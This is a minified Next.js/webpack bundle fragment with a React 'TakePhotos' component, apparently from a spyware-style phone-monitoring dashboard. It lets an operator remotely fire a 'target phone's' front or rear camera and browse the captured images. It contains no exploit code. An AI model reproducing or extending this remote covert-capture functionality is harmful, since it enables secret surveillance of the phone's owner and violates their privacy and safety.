                                className: "flex justify-between items-center flex-wrap gap-y-[12px]",
                                children: [
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                        className: "smj:flex-grow flex items-center select-none",
                                        children: [
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("label", {
                                                className: "flex items-center  ".concat(allDateDetail.length === 0 ? "cursor-no-drop" : "cursor-pointer"),
                                                onClick: handleCheckAllClick,
                                                children: [
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                        className: "w-[20px] h-[20px] flex justify-center items-center\n                            ".concat(checkAll ? "bg-[#2A99FF] active:bg-[#247FDB]" : "[border:1px_solid_#DCDCDC] active:[border:1px_solid_#8D8D8D]", " rounded-[3px]"),
                                                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                            src: "/image/photos/tick.svg",
                                                            alt: "tick",
                                                            width: 16,
                                                            height: 14,
                                                            className: "w-[16.02px] h-[13.79px] ".concat(!checkAll ? "hidden" : "")
                                                        })
                                                    }),
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                        className: "text-[18px] text-[#000000] font-[Poppins] font-[600] leading-[27px] ml-[12px] mr-[32px] smj:mx-[10px]",
                                                        children: t("All Select")
                                                    })
                                                ]
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                src: "/image/photos/delete.svg",
                                                alt: "trash-basket",
                                                width: 20,
                                                height: 21,
                                                className: "w-[20.5px] h-[21.5px] ".concat(checkArr.length === 0 && checkDateArr.length === 0 ? "cursor-no-drop" : "cursor-pointer"),
                                                onClick: ()=>(checkArr.length !== 0 || checkDateArr.length !== 0) && deleteData()
                                            })
                                        ]
                                    }),
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("button", {
                                        className: "w-auto flex justify-center items-center p-[7px_20px] smj:p-[7px_14px_7px_14px] rounded-[8px] text-[14px] text-[#FFFFFF] leading-[21px] relative\n              disabled:cursor-not-allowed ".concat(isShooting ? "bg-[#00000026]" : "bg-[#2A99FF]"),
                                        disabled: isShooting,
                                        onClick: ()=>{
                                            if (localStorage.getItem("isTakePhotosPrompt")) {
                                                addData();
                                            } else {
                                                setFirstTake(true);
                                            }
                                        },
                                        children: [
                                            t("Shoot Now"),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                src: "/image/photos/white-arrow.svg",
                                                alt: "white-arrow",
                                                width: 20,
                                                height: 20,
                                                className: "w-[20px] h-[20px] ml-[10px] transition-transform duration-150 ease-linear ".concat(hoverButton ? "rotate-[180deg]" : "rotate-0"),
                                                onClick: (e)=>{
                                                    e.stopPropagation();
                                                    setHoverButton(!hoverButton);
                                                }
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                className: "absolute top-[37px] w-full h-auto p-3 bg-white rounded-[8px] [box-shadow:0px_0px_12px_0px_#00000026] ".concat(hoverButton || "hidden"),
                                                children: [
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                        className: "flex justify-between items-center",
                                                        onClick: (e)=>{
                                                            e.stopPropagation();
                                                            setCamera(1);
                                                            setHoverButton(false);
                                                        },
                                                        children: [
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                className: "text-[13px] leading-[21px] text-[#00000099]",
                                                                children: t("Rear Camera")
                                                            }),
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                                src: camera == 1 ? "/image/photos/choose.svg" : "/image/photos/no-choose.svg",
                                                                width: 14,
                                                                height: 14,
                                                                alt: ""
                                                            })
                                                        ]
                                                    }),
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                        className: "flex justify-between items-center mt-3",
                                                        onClick: (e)=>{
                                                            e.stopPropagation();
                                                            setCamera(2);
                                                            setHoverButton(false);
                                                        },
                                                        children: [
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                className: "text-[13px] leading-[21px] text-[#00000099]",
                                                                children: t("Front Camera")
                                                            }),
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                                src: camera == 2 ? "/image/photos/choose.svg" : "/image/photos/no-choose.svg",
                                                                width: 14,
                                                                height: 14,
                                                                alt: ""
                                                            })
                                                        ]
                                                    })
                                                ]
                                            })
                                        ]
                                    })
                                ]
                            }),
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                className: "w-auto p-[15px_12px] [box-shadow:0px_0px_12px_0px_#00000061] bg-[#FFFFFF] rounded-[8px] absolute left-[50%] -translate-x-[50%] z-[5254] transition-[top] duration-150 ease-linear ".concat(!showDelete ? "-top-[101%]" : "top-[50%]"),
                                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                    className: "text-nowrap",
                                    children: t("Deleted successfully")
                                })
                            })
                        ]
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(ScrollDivShow, {
                        ref: dom,
                        className: "!h-[calc(var(--vh2)*100-296px)] smj:!h-[calc(var(--vh2)*100-163px)] overflow-auto pb-[20px] bg-white",
                        children: showData.map((item, index)=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                className: "".concat(index === 0 ? "mt-[30px] smj:mt-[24px]" : "mt-[40px] smj:mt-[26px]", " ml-[32px] smj:mx-[20px]"),
                                children: [
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                        className: "flex items-center mb-[31px]",
                                        children: [
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                className: "w-[20px] h-[20px] flex justify-center items-center rounded-[3px] cursor-pointer select-none\n                                ".concat(checkDateArr.includes(item.date) ? "bg-[#2A99FF] active:bg-[#247FDB]" : "[border:1px_solid_#DCDCDC] active:[border:1px_solid_#8D8D8D]"),
                                                onClick: ()=>changeCheckState(item.date),
                                                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                    src: "/image/photos/tick.svg",
                                                    alt: "tick",
                                                    width: 16,
                                                    height: 14,
                                                    className: "w-[16.02px] h-[13.79px] ".concat(!checkDateArr.includes(item.date) ? "hidden" : "")
                                                })
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                src: "/image/photos/date.svg",
                                                alt: "calendar",
                                                width: 24,
                                                height: 24,
                                                className: "w-[24px] h-[24px] ml-[10px] mr-[12px]"
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                className: "text-[16px] text-[#333333] font-[Poppins] font-[600] leading-[24px]",
                                                children: dayjs__WEBPACK_IMPORTED_MODULE_4___default()(item.date).format("MMM DD,YYYY")
                                            })
                                        ]
                                    }),
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("ul", {
                                        className: "flex flex-wrap gap-x-[30px] gap-y-[21px] smj:grid smj:grid-cols-2 smj:gap-x-[25px] items-center",
                                        children: item.list.map((item2, i)=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("li", {
                                                children: item2.thumb !== false ? /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                    className: "bg-white rounded-[8px] overflow-hidden [box-shadow:0px_0px_15px_0px_#0000001F] relative",
                                                    children: [
                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                            src: "https://cos.spyx.com/" + item2.thumb.url,
                                                            alt: "",
                                                            width: 160,
                                                            height: 160,
                                                            className: "w-[160px] h-[160px] smj:w-full smj:h-[155px] object-cover cursor-pointer",
                                                            onClick: ()=>{
                                                                const nowIndex = intiData.findIndex((item)=>item.date === item2.date);
                                                                setClickData({
                                                                    index: nowIndex,
                                                                    date: item2.date,
                                                                    url: item2.thumb.url,
                                                                    position: nowIndex === 0 ? 0 : nowIndex === intiData.length - 1 ? 2 : 1
                                                                });
                                                                setClickFlag(true);
                                                            }
                                                        }),
                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                            className: "flex gap-x-[8px] ml-[8px] my-[10px]",
                                                            children: [
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                                    className: "w-[20px] h-[20px] flex justify-center items-center rounded-[3px] cursor-pointer select-none\n                                        ".concat(checkArr.includes(item2.date) ? "bg-[#2A99FF] active:bg-[#247FDB]" : "[border:1px_solid_#DCDCDC] active:[border:1px_solid_#8D8D8D]"),
                                                                    onClick: ()=>changeCheckState(item2.date),
                                                                    children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                                        src: "/image/photos/tick.svg",
                                                                        alt: "tick",
                                                                        width: 16,
                                                                        height: 14,
                                                                        className: "w-[16.02px] h-[13.79px] ".concat(!checkArr.includes(item2.date) ? "hidden" : "")
                                                                    })
                                                                }),
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                    className: "text-[14px] text-[#666666] font-[Poppins] font-[400] leading-[21px]",
                                                                    children: dayjs__WEBPACK_IMPORTED_MODULE_4___default()(item2.date).format("HH:mm:ss")
                                                                })
                                                            ]
                                                        })
                                                    ]
                                                }) : /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                    className: "bg-white rounded-[8px] overflow-hidden [box-shadow:0px_0px_15px_0px_#0000001F] relative",
                                                    children: [
                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                            className: "w-[160px] h-[160px] smj:w-full smj:h-[155px] bg-[#EBEBEB] flex flex-col justify-center items-center",
                                                            children: [
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                                    src: "/image/photos/shooting.gif",
                                                                    width: 50,
                                                                    height: 50,
                                                                    alt: "shooting",
                                                                    className: ""
                                                                }),
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("p", {
                                                                    className: "mt-4 text-[12px] leading-[18px] text-[#000000B2] text-center",
                                                                    children: [
                                                                        t("Taking photo"),
                                                                        "...."
                                                                    ]
                                                                })
                                                            ]
                                                        }),
                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                            className: "flex gap-x-[8px] ml-[8px] my-[10px]",
                                                            children: [
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                                    className: "w-[20px] h-[20px] flex justify-center items-center rounded-[3px] [border:1px_solid_#DCDCDC]"
                                                                }),
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                    className: "text-[14px] text-[#666666] font-[Poppins] font-[400] leading-[21px]",
                                                                    children: time
                                                                })
                                                            ]
                                                        })
                                                    ]
                                                })
                                            }, i))
                                    })
                                ]
                            }, index))
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                        className: "w-full h-full ".concat(!clickFlag ? "hidden" : "", " bg-[#00000033] fixed inset-0 z-[52]"),
                        onClick: ()=>setClickFlag(false),
                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                            src: "/image/photos/tips-x.svg",
                            alt: "tips-x",
                            width: 30,
                            height: 30,
                            className: "w-[30px] h-[30px] absolute top-[145px] right-[93px] smj:top-[90px] smj:right-[30px] cursor-pointer"
                        })
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                        className: "h-full max-h-[90%] max-w-[80%] smj:w-[75%] flex justify-center items-center ".concat(!clickFlag ? "hidden" : "", " absolute top-[50%] -translate-y-[50%] left-[50%] -translate-x-[50%] z-[54]"),
                        onClick: ()=>setClickFlag(false),
                        children: [
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                src: "https://cos.spyx.com/" + clickData.url,
                                alt: "",
                                width: 100,
                                height: 100,
                                className: "w-full h-full smj:h-auto object-contain",
                                onClick: (e)=>{
                                    e.stopPropagation();
                                    if (window.innerWidth <= 990) setFullShow(true);
                                }
                            }),
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                className: "absolute w-[52px] h-[52px] smj:w-[30px] smj:h-[30px] top-[50%] -translate-y-[50%] -left-[58px] smj:-left-[40px] cursor-pointer",
                                onMouseOver: ()=>setHoverData(0),
                                onMouseOut: ()=>setHoverData(-1),
                                onClick: (e)=>{
                                    e.stopPropagation();
                                    clickData.index > 0 && changeClickData(0);
                                },
                                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "w-[52px] h-[52px] smj:w-[30px] smj:h-[30px] !bg-white rounded-[50%] flex justify-center items-center\n                 ".concat(clickData.position === 0 ? "[border:1px_#C1C6D7_solid]" : hoverData === 0 ? "shadow-[0px_0px_3px_gray]" : ""),
                                    children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                        className: "w-[15px] h-[15px] smj:w-[10px] smj:h-[10px] relative left-[5%] [clip-path:polygon(0%_0%,15%_0%,15%_85%,100%_85%,100%_100%,0%_100%)] rotate-[45deg]\n                   ".concat(clickData.position === 0 ? "bg-[#D8E0F2]" : hoverData === 0 ? "bg-[#2A99FF]" : " bg-[#282828]")
                                    })
                                })
                            }),
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                className: "absolute w-[52px] h-[52px] smj:w-[30px] smj:h-[30px] top-[50%] -translate-y-[50%] -right-[58px] smj:-right-[40px] cursor-pointer",
                                onMouseOver: ()=>setHoverData(1),
                                onMouseOut: ()=>setHoverData(-1),
                                onClick: (e)=>{
                                    e.stopPropagation();
                                    clickData.index < intiData.length - 1 && changeClickData(1);
                                },
                                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "w-[52px] h-[52px] smj:w-[30px] smj:h-[30px] !bg-white rounded-[50%] flex justify-center items-center\n                 ".concat(clickData.position === 2 || intiData.length === 1 ? "[border:1px_#C1C6D7_solid]" : hoverData === 1 ? "shadow-[0px_0px_3px_gray]" : ""),
                                    children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                        className: "w-[15px] h-[15px] smj:w-[10px] smj:h-[10px] relative -left-[5%] [clip-path:polygon(0%_0%,15%_0%,15%_85%,100%_85%,100%_100%,0%_100%)] -rotate-[135deg]\n                   ".concat(clickData.position === 2 || intiData.length === 1 ? "bg-[#D8E0F2]" : hoverData === 1 ? "bg-[#2A99FF]" : " bg-[#282828]")
                                    })
                                })
                            })
                        ]
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                        className: "w-full h-full ".concat(firstTake || "hidden", " bg-[#00000033] fixed inset-0 smjs:left-[150px] z-[52]"),
                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                            className: "mx-auto w-[430px] smj:w-[88%] h-auto bg-white rounded-[16px] p-[50px] smj:p-6 mt-[350px] smj:mt-[70%] relative",
                            children: [
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("p", {
                                    className: "font-[16px] leading-[24px] text-[#000000]",
                                    children: [
                                        t("Do you want to take the photo now using the target phones"),
                                        " ",
                                        camera == 1 ? t("rear camera") : t("front camera")
                                    ]
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                    className: "flex items-center mt-[27px] mb-[32px] smj:mt-[12px] smj:mb-[24px]",
                                    children: [
                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("button", {
                                            className: "w-[20px] h-[20px] flex justify-center items-center rounded-[3px] cursor-pointer select-none\n                ".concat(firstChoose ? "bg-[#2A99FF] active:bg-[#247FDB]" : "[border:1px_solid_#DCDCDC] active:[border:1px_solid_#8D8D8D]"),
                                            onClick: ()=>setFirstChoose(!firstChoose),
                                            children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                                                src: "/image/photos/tick.svg",
                                                alt: "tick",
                                                width: 16,
                                                height: 14,
                                                className: "w-[16.02px] h-[13.79px] ".concat(!firstChoose ? "hidden" : "")
                                            })
                                        }),
                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                            className: "text-[14px] leading-[21px] text-[#626262] ml-[10px]",
                                            children: t("Always take the photo without asking")
                                        })
                                    ]
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                    className: "flex justify-center items-center",
                                    children: [
                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("button", {
                                            className: "w-auto h-[36px] px-[40px] bg-[#D9D9D9] rounded-[20px] font-[16px] leading-[36px] font-[500] text-white mr-[26px]",
                                            onClick: ()=>setFirstTake(false),
                                            children: t("No")
                                        }),
                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("button", {
                                            className: "w-auto h-[36px] px-[40px] bg-[#FFCF55] rounded-[20px] font-[16px] leading-[36px] font-[500] text-[#1B1C2B] hover:bg-[#f0b933] cursor-pointer",
                                            onClick: ()=>{
                                                setFirstTake(false);
                                                if (firstChoose) localStorage.setItem("isTakePhotosPrompt", true);
                                                addData();
                                            },
                                            children: t("Yes")
                                        })
                                    ]
                                })
                            ]
                        })
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                        className: "w-full h-full ".concat(isShowError || "hidden", " bg-[#00000033] fixed inset-0 smjs:left-[150px] z-[52]"),
                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                            className: "mx-auto w-[430px] smj:w-[88%] h-auto bg-white rounded-[16px] p-[50px] smj:p-6 mt-[350px] smj:mt-[70%] relative",
                            children: [
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                    className: "font-[16px] leading-[24px] text-[#000000] font-[600]",
                                    children: shootingResult == 1 ? t("Photo capture successfully") : t("Photo capture failed")
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                    className: "text-[16px] leading-[24px] text-[#000000CC] mt-[12px]",
                                    children: shootingResult == 1 ? t("Shooting in progress will upload shooting data later") : shootingResult == 2 ? t("The target phone is powered off or is not connecting to the internet") : shootingResult == 3 ? t("The target phones camera is currently in use") : shootingResult == 4 ? t("Camera permission is not enabled on the target phone") : ""
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                    className: "text-[16px] leading-[24px] text-[#000000CC] mt-[8px]",
                                    children: shootingResult == 1 ? t("Please wait about 15 minutes to refresh the page") : shootingResult == 2 || shootingResult == 3 ? t("Please try again later") : shootingResult == 4 ? t("Please enable it and try again") : ""
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("button", {
                                    className: "w-auto flex mx-auto h-[36px] px-[40px] bg-[#FFCF55] rounded-[20px] font-[16px] leading-[36px] font-[500] text-[#1B1C2B] hover:bg-[#f0b933] cursor-pointer mt-[24px]",
                                    onClick: ()=>setIsShowError(false),
                                    children: t("OK")
                                })
                            ]
                        })
                    })
                ]
            }),
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                className: "w-full h-full flex justify-center items-center bg-black absolute top-0 left-0 z-[58] ".concat(!fullShow ? "hidden" : "smjs:hidden"),
                onClick: ()=>setFullShow(false),
                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_3___default()), {
                    src: "https://cos.spyx.com/" + clickData.url,
                    alt: "",
                    width: 100,
                    height: 100,
                    className: "w-full h-full object-contain"
                })
            }),
            isLoading ? /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                className: "absolute inset-0 z-[20] bg-[#FFF] rounded-[10px]",
                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_11__/* ["default"] */ .Z, {})
            }) : null,
            intiData.length > 0 || isLoading || /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                className: "text-center px-5 absolute inset-0 flex justify-center items-center pointer-events-none",
                children: [
                    t("It appears theres no data to show here yet"),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("br", {}),
                    t("If data exists it may take up to 1 hour to download and appear"),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("br", {}),
                    t("We suggest checking back in a little while")
                ]
            })
        ]
    });
};
/* harmony default export */ __webpack_exports__["default"] = (TakePhotos);


/***/ }),

/***/ 74249:
/***/ (function(module) {

// extracted by mini-css-extract-plugin
module.exports = {"contentLoadingRoot":"ContentLoading_contentLoadingRoot__ypzGH","contentLoadingRootFullScreen":"ContentLoading_contentLoadingRootFullScreen__ZmB8e","contentLoadingSpinner":"ContentLoading_contentLoadingSpinner__4vCxU","content-loading-spin":"ContentLoading_content-loading-spin__K0YUP","contentLoadingLabel":"ContentLoading_contentLoadingLabel__S0w79"};

/***/ })

},
/******/ function(__webpack_require__) { // webpackRuntimeModules
/******/ var __webpack_exec__ = function(moduleId) { return __webpack_require__(__webpack_require__.s = moduleId); }
/******/ __webpack_require__.O(0, [5675,9774,2888,179], function() { return __webpack_exec__(57941); });
/******/ var __webpack_exports__ = __webpack_require__.O();
/******/ _N_E = __webpack_exports__;
/******/ }
]);